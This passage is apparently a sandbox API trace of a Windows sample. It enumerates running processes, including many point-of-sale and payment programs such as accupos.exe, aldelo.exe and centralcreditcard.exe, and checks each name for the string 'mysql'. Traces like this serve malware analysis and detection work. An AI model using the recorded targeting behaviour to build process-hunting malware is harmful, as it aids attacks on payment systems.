cchWideChar=-1, lpMultiByteStr=0x3581940, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0177.431] StrStrIA (lpFirst="whatsapp.exe", lpSrch="mysql") returned 0x0 [0177.431] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0177.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.432] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581b38 [0177.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3581b38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0177.432] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0177.432] StrStrIA (lpFirst="winscp.exe", lpSrch="mysql") returned 0x0 [0177.432] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0177.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.433] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595c08 [0177.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3595c08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0177.433] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0177.434] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="mysql") returned 0x0 [0177.434] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0177.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.435] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595c88 [0177.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3595c88, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0177.435] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0177.435] StrStrIA (lpFirst="active-charge.exe", lpSrch="mysql") returned 0x0 [0177.435] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0177.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.436] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581d78 [0177.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3581d78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0177.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0177.436] StrStrIA (lpFirst="accupos.exe", lpSrch="mysql") returned 0x0 [0177.436] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0177.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.437] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581cd0 [0177.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3581cd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0177.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0177.437] StrStrIA (lpFirst="afr38.exe", lpSrch="mysql") returned 0x0 [0177.437] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0177.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.438] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581c58 [0177.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3581c58, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0177.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0177.438] StrStrIA (lpFirst="aldelo.exe", lpSrch="mysql") returned 0x0 [0177.438] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0177.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0177.440] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3581c10 [0177.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3581c10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0177.440] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0177.440] StrStrIA (lpFirst="ccv_server.exe", lpSrch="mysql") returned 0x0 [0177.440] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0177.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.441] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3595dc8 [0177.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3595dc8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0177.441] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0177.441] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="mysql") returned 0x0 [0177.441] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0177.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0177.442] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3595c28 [0177.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3595c28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0177.443] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0177.443] StrStrIA (lpFirst="creditservice.exe", lpSrch="mysql") returned 0x0 [0177.443] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0177.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.444] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581b80 [0177.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3581b80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0177.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0177.444] StrStrIA (lpFirst="edcsvr.exe", lpSrch="mysql") returned 0x0 [0177.444] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0177.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.445] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581ce8 [0177.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3581ce8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0177.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0177.445] StrStrIA (lpFirst="fpos.exe", lpSrch="mysql") returned 0x0 [0177.445] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0177.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.446] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581d18 [0177.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3581d18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0177.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0177.446] StrStrIA (lpFirst="isspos.exe", lpSrch="mysql") returned 0x0 [0177.446] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0177.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.447] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595e28 [0177.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3595e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0177.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0177.447] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="mysql") returned 0x0 [0177.448] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0177.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.449] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581d30 [0177.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3581d30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0177.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0177.449] StrStrIA (lpFirst="omnipos.exe", lpSrch="mysql") returned 0x0 [0177.449] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0177.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.450] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581d90 [0177.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3581d90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0177.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0177.450] StrStrIA (lpFirst="spcwin.exe", lpSrch="mysql") returned 0x0 [0177.450] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0177.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.451] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3595d08 [0177.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3595d08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0177.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0177.451] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="mysql") returned 0x0 [0177.451] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0177.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.452] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581d60 [0177.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3581d60, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0177.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0177.452] StrStrIA (lpFirst="utg2.exe", lpSrch="mysql") returned 0x0 [0177.452] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0177.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.453] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581b08 [0177.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3581b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0177.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0177.453] StrStrIA (lpFirst="saying.exe", lpSrch="mysql") returned 0x0 [0177.453] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0177.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.454] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581d48 [0177.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3581d48, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0177.454] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0177.455] StrStrIA (lpFirst="ripe.exe", lpSrch="mysql") returned 0x0 [0177.455] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0177.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.456] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581c70 [0177.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3581c70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0177.456] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0177.456] StrStrIA (lpFirst="acoustic.exe", lpSrch="mysql") returned 0x0 [0177.456] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0177.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.457] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581cb8 [0177.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3581cb8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0177.457] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0177.457] StrStrIA (lpFirst="mail.exe", lpSrch="mysql") returned 0x0 [0177.457] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0177.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.458] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581bb0 [0177.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3581bb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0177.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0177.458] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mysql") returned 0x0 [0177.458] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.459] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581c40 [0177.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 